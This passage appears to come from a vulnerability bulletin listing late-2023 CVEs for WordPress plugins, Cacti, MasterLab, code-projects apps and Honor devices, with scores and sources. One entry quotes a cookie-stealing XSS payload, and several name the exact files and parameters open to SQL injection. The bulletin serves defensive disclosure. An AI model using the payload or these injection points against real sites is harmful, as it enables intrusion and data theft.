wordpress — wordpress Cross-Site Request Forgery (CSRF), Deserialization of Untrusted Data vulnerability in ThemeHigh Job Manager & Career – Manage job board listings, and recruitments. This issue affects Job Manager & Career – Manage job board listings, and recruitments: from n/a through 1.4.4. 2023-12-29 9.6 CVE-2023-51545
audit@patchstack.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the ‘content-dir’ HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server’s php.ini is configured with ‘allow_url_include’ set to ‘on’. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP. 2023-12-23 9.8 CVE-2023-6971
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the ‘content-backups’ and ‘content-name’, ‘content-manifest’, or ‘content-bmitmp’ and ‘content-identy’ HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. 2023-12-23 9.8 CVE-2023-6972
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in miniOrange miniOrange’s Google Authenticator – WordPress Two Factor Authentication – 2FA, Two Factor, OTP SMS and Email | Passwordless login. This issue affects miniOrange’s Google Authenticator – WordPress Two Factor Authentication – 2FA, Two Factor, OTP SMS and Email | Passwordless login: from n/a through 5.6.1. 2023-12-29 8.1 CVE-2022-44589
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in BinaryStash WP Booklet. This issue affects WP Booklet: from n/a through 2.1.8. 2023-12-29 8.5 CVE-2023-22677
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in WooCommerce Product Add-Ons. This issue affects Product Add-Ons: from n/a through 6.1.3. 2023-12-28 8.2 CVE-2023-32795
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in wpdevelop, oplugins Booking Manager. This issue affects Booking Manager: from n/a through 2.1.5. 2023-12-28 8.5 CVE-2023-50840
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Repute Infosystems BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin. This issue affects BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin: from n/a through 1.0.72. 2023-12-28 8.5 CVE-2023-50841
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Matthew Fries MF Gig Calendar. This issue affects MF Gig Calendar: from n/a through 1.2.1. 2023-12-28 8.5 CVE-2023-50842
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform. This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.3. 2023-12-28 7.5 CVE-2023-32513
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WebFactory Ltd Login Lockdown – Protect Login Form. This issue affects Login Lockdown – Protect Login Form: from n/a through 2.06. 2023-12-29 7.6 CVE-2023-50837
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Basix NEX-Forms – Ultimate Form Builder – Contact forms and much more. This issue affects NEX-Forms – Ultimate Form Builder – Contact forms and much more: from n/a through 8.5.5. 2023-12-28 7.6 CVE-2023-50838
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Clockwork Clockwork SMS Notifications. This issue affects Clockwork SMS Notifications: from n/a through 3.0.4. 2023-12-28 7.6 CVE-2023-50843
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in James Ward Mail logging – WP Mail Catcher. This issue affects Mail logging – WP Mail Catcher: from n/a through 2.1.3. 2023-12-28 7.6 CVE-2023-50844
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in AyeCode – WordPress Business Directory Plugins GeoDirectory – WordPress Business Directory Plugin, or Classified Directory. This issue affects GeoDirectory – WordPress Business Directory Plugin, or Classified Directory: from n/a through 2.3.28. 2023-12-28 7.6 CVE-2023-50845
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in RegistrationMagic RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login. This issue affects RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login: from n/a through 5.2.4.5. 2023-12-28 7.6 CVE-2023-50846
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Collne Inc. Welcart e-Commerce. This issue affects Welcart e-Commerce: from n/a through 2.9.3. 2023-12-28 7.6 CVE-2023-50847
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Aaron J 404 Solution. This issue affects 404 Solution: from n/a through 2.34.0. 2023-12-28 7.6 CVE-2023-50848
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in E2Pdf.Com E2Pdf – Export To Pdf Tool for WordPress. This issue affects E2Pdf – Export To Pdf Tool for WordPress: from n/a through 1.20.23. 2023-12-28 7.6 CVE-2023-50849
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in N Squared Appointment Booking Calendar – Simply Schedule Appointments Booking Plugin. This issue affects Appointment Booking Calendar – Simply Schedule Appointments Booking Plugin: from n/a before 1.6.6.1. 2023-12-28 7.6 CVE-2023-50851
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in StylemixThemes Booking Calendar | Appointment Booking | BookIt. This issue affects Booking Calendar | Appointment Booking | BookIt: from n/a through 2.4.3. 2023-12-28 7.6 CVE-2023-50852
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Nasirahmed Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms. This issue affects Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms: from n/a through 1.75.0. 2023-12-28 7.6 CVE-2023-50853
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Squirrly Squirrly SEO – Advanced Pack. This issue affects Squirrly SEO – Advanced Pack: from n/a through 2.3.8. 2023-12-28 7.6 CVE-2023-50854
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Sam Perrow Pre* Party Resource Hints. This issue affects Pre* Party Resource Hints: from n/a through 1.8.18. 2023-12-28 7.6 CVE-2023-50855
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in FunnelKit Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits. This issue affects Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits: from n/a through 2.14.3. 2023-12-28 7.6 CVE-2023-50856
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in FunnelKit Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit. This issue affects Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit: from n/a through 2.6.1. 2023-12-28 7.6 CVE-2023-50857
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodexThemes TheGem – Creative Multi-Purpose & WooCommerce WordPress Theme allows Reflected XSS. This issue affects TheGem – Creative Multi-Purpose & WooCommerce WordPress Theme: from n/a through 5.9.1. 2023-12-29 7.1 CVE-2023-50892
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in UpSolution Impreza – WordPress Website and WooCommerce Builder allows Reflected XSS. This issue affects Impreza – WordPress Website and WooCommerce Builder: from n/a through 8.17.4. 2023-12-29 7.1 CVE-2023-50893
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in HasThemes HT Mega – Absolute Addons For Elementor allows Reflected XSS. This issue affects HT Mega – Absolute Addons For Elementor: from n/a through 2.3.8. 2023-12-29 7.1 CVE-2023-50901
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ian Kennerley Google Photos Gallery with Shortcodes allows Reflected XSS. This issue affects Google Photos Gallery with Shortcodes: from n/a through 4.0.2. 2023-12-29 7.1 CVE-2023-51373
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Undsgn Uncode – Creative & WooCommerce WordPress Theme allows Reflected XSS. This issue affects Uncode – Creative & WooCommerce WordPress Theme: from n/a through 2.8.6. 2023-12-28 7.1 CVE-2023-51501
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WS Form WS Form LITE – Drag & Drop Contact Form Builder for WordPress. This issue affects WS Form LITE – Drag & Drop Contact Form Builder for WordPress: from n/a through 1.9.170. 2023-12-29 7.6 CVE-2023-52135
audit@patchstack.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the ‘url’ parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system. 2023-12-23 7.2 CVE-2023-7002
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
yaztek_software_technologies_and_computer_systems — e-commerce_software Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Yaztek Software Technologies and Computer Systems E-Commerce Software allows SQL Injection. This issue affects E-Commerce Software: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4674
iletisim@usom.gov.tr

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
advplyr — audiobookshelf Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.7.0, Audiobookshelf is vulnerable to unauthenticated blind server-side request (SSRF) vulnerability in Auth.js. This vulnerability has been addressed in version 2.7.0. There are no known workarounds for this vulnerability. 2023-12-27 4.3 CVE-2023-51665
security-advisories@github.com
security-advisories@github.com
advplyr — audiobookshelf Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.7.0, Audiobookshelf is vulnerable to unauthenticated blind server-side request (SSRF) vulnerability in `podcastUtils.js`. This vulnerability has been addressed in version 2.7.0. There are no known workarounds for this vulnerability. 2023-12-27 4.3 CVE-2023-51697
security-advisories@github.com
security-advisories@github.com
aws — aws-sdk-php AWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1. 2023-12-22 6 CVE-2023-51651
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
cacti — cacti Cacti is an open source operational monitoring and fault management framework. A reflection cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php.` When uploading an xml template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains unfiltered xml template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available. 2023-12-22 6.1 CVE-2023-50250
security-advisories@github.com
security-advisories@github.com
cacti — cacti Reflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25, allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php. 2023-12-22 6.1 CVE-2023-50569
cve@mitre.org
cve@mitre.org
cacti — cacti Cacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `graphs_new.php`. Impact of the vulnerability – execution of arbitrary javascript code in the attacked user’s browser. This issue has been patched in version 1.2.26. 2023-12-22 5.4 CVE-2023-49086
security-advisories@github.com
cacti — cacti Cacti is an open source operational monitoring and fault management framework. The fix applied for CVE-2023-39515 in version 1.2.25 is incomplete as it enables an adversary to have a victim browser execute malicious code when a victim user hovers their mouse over the malicious data source path in `data_debug.php`. To perform the cross-site scripting attack, the adversary needs to be an authorized cacti user with the following permissions: `General Administration>Sites/Devices/Data`. The victim of this attack could be any account with permissions to view `http://<HOST>/cacti/data_debug.php`. As of time of publication, no complete fix has been included in Cacti. 2023-12-22 4.8 CVE-2023-49088
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
campcodes — chic_beauty_salon A vulnerability classified as critical was found in Campcodes Chic Beauty Salon 20230703. Affected by this vulnerability is an unknown functionality of the file product-list.php of the component Product Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249157 was assigned to this vulnerability. 2023-12-29 4.7 CVE-2023-7150
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability was found in Campcodes Online College Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/borrow_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249362 is the identifier assigned to this vulnerability. 2023-12-30 4.7 CVE-2023-7175
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability classified as critical has been found in Campcodes Online College Library System 1.0. This affects an unknown part of the file /admin/return_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249363. 2023-12-30 4.7 CVE-2023-7176
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability classified as critical was found in Campcodes Online College Library System 1.0. This vulnerability affects unknown code of the file /admin/book_add.php of the component HTTP POST Request Handler. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249364. 2023-12-30 4.7 CVE-2023-7177
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability, which was classified as critical, has been found in Campcodes Online College Library System 1.0. This issue affects some unknown processing of the file /admin/book_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249365 was assigned to this vulnerability. 2023-12-30 4.7 CVE-2023-7178
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability, which was classified as critical, was found in Campcodes Online College Library System 1.0. Affected is an unknown function of the file /admin/category_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249366 is the identifier assigned to this vulnerability. 2023-12-30 4.7 CVE-2023-7179
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability was found in Muyun DedeBIZ up to 6.2.12 and classified as critical. Affected by this issue is some unknown functionality of the component Add Attachment Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249368. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-30 4.7 CVE-2023-7181
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cloudflare — wrangler Sending specially crafted HTTP requests and inspector messages to Wrangler’s dev server could result in any file on the user’s computer being accessible over the local network. An attacker that could trick any user on the local network into opening a malicious website could also read any file. 2023-12-29 6.4 CVE-2023-7079
cna@cloudflare.com
cna@cloudflare.com
cna@cloudflare.com
code-projects — automated_voting_system A vulnerability classified as critical has been found in code-projects Automated Voting System 1.0. This affects an unknown part of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249129 was assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7126
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — automated_voting_system A vulnerability classified as critical was found in code-projects Automated Voting System 1.0. This vulnerability affects unknown code of the component Login. The manipulation of the argument idno leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249130 is the identifier assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7127
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — automated_voting_system A vulnerability, which was classified as critical, has been found in code-projects Voting System 1.0. This issue affects some unknown processing of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249131. 2023-12-28 6.3 CVE-2023-7128
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — client_details_system A vulnerability, which was classified as critical, has been found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the component HTTP POST Request Handler. The manipulation of the argument uemail leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249140. 2023-12-28 6.3 CVE-2023-7137
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — client_details_system A vulnerability, which was classified as critical, was found in code-projects Client Details System 1.0. This affects an unknown part of the file /admin of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249141 was assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7138
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — client_details_system A vulnerability has been found in code-projects Client Details System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/regester.php of the component HTTP POST Request Handler. The manipulation of the argument fname/lname/email/contact leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249142 is the identifier assigned to this vulnerability. 2023-12-28 4.3 CVE-2023-7139
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/manage-users.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249143. 2023-12-28 4.3 CVE-2023-7140
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/update-clients.php. The manipulation of the argument uid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249144. 2023-12-29 4.3 CVE-2023-7141
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/clientview.php. The manipulation of the argument ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249145 was assigned to this vulnerability. 2023-12-29 4.3 CVE-2023-7142
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — e-commerce_site A vulnerability, which was classified as problematic, was found in code-projects E-Commerce Site 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument keyword with the input <video/src=x onerror=alert(document.cookie)> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249096. 2023-12-28 4.3 CVE-2023-7124
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — faculty_management_system A vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744. 2023-12-22 6.1 CVE-2023-7057
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — faculty_management_system A vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743. 2023-12-22 5.4 CVE-2023-7056
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — intern_membership_management_system A vulnerability was found in code-projects Intern Membership Management System 2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /user_registration/ of the component User Registration. The manipulation of the argument userName leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249134 is the identifier assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7131
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — point_of_sales_and_inventory_management_system A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability. 2023-12-22 6.1 CVE-2023-7075
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — voting_system A vulnerability, which was classified as critical, was found in code-projects Voting System 1.0. Affected is an unknown function of the component Voters Login. The manipulation of the argument voter leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249132. 2023-12-28 5.5 CVE-2023-7129
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
concrete_cms — concrete_cms Concrete CMS 9 before 9.2.3 is vulnerable to Cross Site Request Forgery (CSRF) via /ccm/system/dialogs/logs/delete_all/submit. An attacker can force an admin user to delete server report logs on a web application to which they are currently authenticated. 2023-12-25 4.3 CVE-2023-48652
cve@mitre.org
cve@mitre.org
dell — cpg_bios
 		 Dell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system. 2023-12-22 6.7 CVE-2023-39251
security_alert@emc.com
dfir-iris — iris-web Iris is a web collaborative platform aiming to help incident responders sharing technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.3.7. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker need to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.3.7 of iris-web. No known workarounds are available. 2023-12-22 4.6 CVE-2023-50712
security-advisories@github.com
security-advisories@github.com
ffcss — ffcss ffcss is a CLI interface to apply and configure Firefox CSS themes. Prior to 0.2.0, the function `lookupPreprocess()` is meant to apply some transformations to a string by disabling characters in the regex `[-_ .]`. However, due to the use of late Unicode normalization of type NFKD, it is possible to bypass that validation and re-introduce all the characters in the regex `[-_ .]`. The `lookupPreprocess()` can be easily bypassed with equivalent Unicode characters like U+FE4D (?), which would result in the omitted U+005F (_), for instance. The `lookupPreprocess()` function is only ever used to search for themes loosely (case insensitively, while ignoring dashes, underscores and dots), so the actual security impact is classified as low. This vulnerability is fixed in 0.2.0. There are no known workarounds. 2023-12-28 5.3 CVE-2023-52081
security-advisories@github.com
security-advisories@github.com
gopeak — masterlab A vulnerability classified as critical has been found in gopeak MasterLab up to 3.3.10. This affects the function sqlInject of the file app/ctrl/framework/Feature.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249147. 2023-12-29 6.3 CVE-2023-7144
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gopeak — masterlab A vulnerability classified as critical was found in gopeak MasterLab up to 3.3.10. This vulnerability affects the function sqlInject of the file app/ctrl/Framework.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249148. 2023-12-29 6.3 CVE-2023-7145
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gopeak — masterlab A vulnerability, which was classified as critical, has been found in gopeak MasterLab up to 3.3.10. This issue affects the function sqlInjectDelete of the file app/ctrl/framework/Feature.php of the component HTTP POST Request Handler. The manipulation of the argument phone leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249149 was assigned to this vulnerability. 2023-12-29 6.3 CVE-2023-7146
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gopeak — masterlab A vulnerability, which was classified as critical, was found in gopeak MasterLab up to 3.3.10. Affected is the function base64ImageContent of the file app/ctrl/User.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. VDB-249150 is the identifier assigned to this vulnerability. 2023-12-29 6.3 CVE-2023-7147
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gopeak — masterlab A vulnerability was found in gopeak MasterLab up to 3.3.10. It has been declared as critical. Affected by this vulnerability is the function add/update of the file app/ctrl/admin/User.php. The manipulation of the argument avatar leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249181 was assigned to this vulnerability. 2023-12-29 4.7 CVE-2023-7159
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gradio — gradio Gradio is an open-source Python package that allows you to quickly build a demo or web application for your machine learning model, API, or any arbitary Python function. Versions of `gradio` prior to 4.11.0 contained a vulnerability in the `/file` route which made them susceptible to file traversal attacks in which an attacker could access arbitrary files on a machine running a Gradio app with a public URL (e.g. if the demo was created with `share=True`, or on Hugging Face Spaces) if they knew the path of files to look for. This issue has been patched in version 4.11.0. 2023-12-22 5.6 CVE-2023-51449
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
hail — hail Hail is an open-source, general-purpose, Python-based data analysis tool with additional data types and methods for working with genomic data. Hail relies on OpenID Connect (OIDC) email addresses from ID tokens to verify the validity of a user’s domain, but because users have the ability to change their email address, they could create accounts and use resources in clusters that they should not have access to. For example, a user could create a Microsoft or Google account and then change their email to `test@example.org`. This account can then be used to create a Hail Batch account in Hail Batch clusters whose organization domain is `example.org`. The attacker is not able to access private data or impersonate another user, but they would have the ability to run jobs if Hail Batch billing projects are enabled and create Azure Tenants if they have Azure Active Directory Administrator access. 2023-12-29 5.3 CVE-2023-51663
security-advisories@github.com
hcl_software — hcl_launch An HCL UrbanCode Deploy Agent installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. 2023-12-28 6.2 CVE-2023-45702
psirt@hcl.com
hcl_software — hcl_launch HCL Launch could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. 2023-12-28 4.3 CVE-2023-45701
psirt@hcl.com
honor — fri-an00 Some Honor products are affected by file writing vulnerability, successful exploitation could cause information disclosure. 2023-12-29 6.6 CVE-2023-23426
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — honorboardapp Some Honor products are affected by information leak vulnerability; successful exploitation could cause the information leak. 2023-12-29 4 CVE-2023-23434
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — lge-an00 Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause device service exceptions. 2023-12-29 4 CVE-2023-23438
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — lge-an00 Some Honor products are affected by information leak vulnerability; successful exploitation could cause the information leak. 2023-12-29 4 CVE-2023-23439
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 6 CVE-2023-51429
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 4 CVE-2023-23427
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 4 CVE-2023-23429
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by type confusion vulnerability; successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-23442
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by type confusion vulnerability; successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-23443
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-51426
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-51427
3836d913-7555-4dd0-a509-f5667fdf5fe4
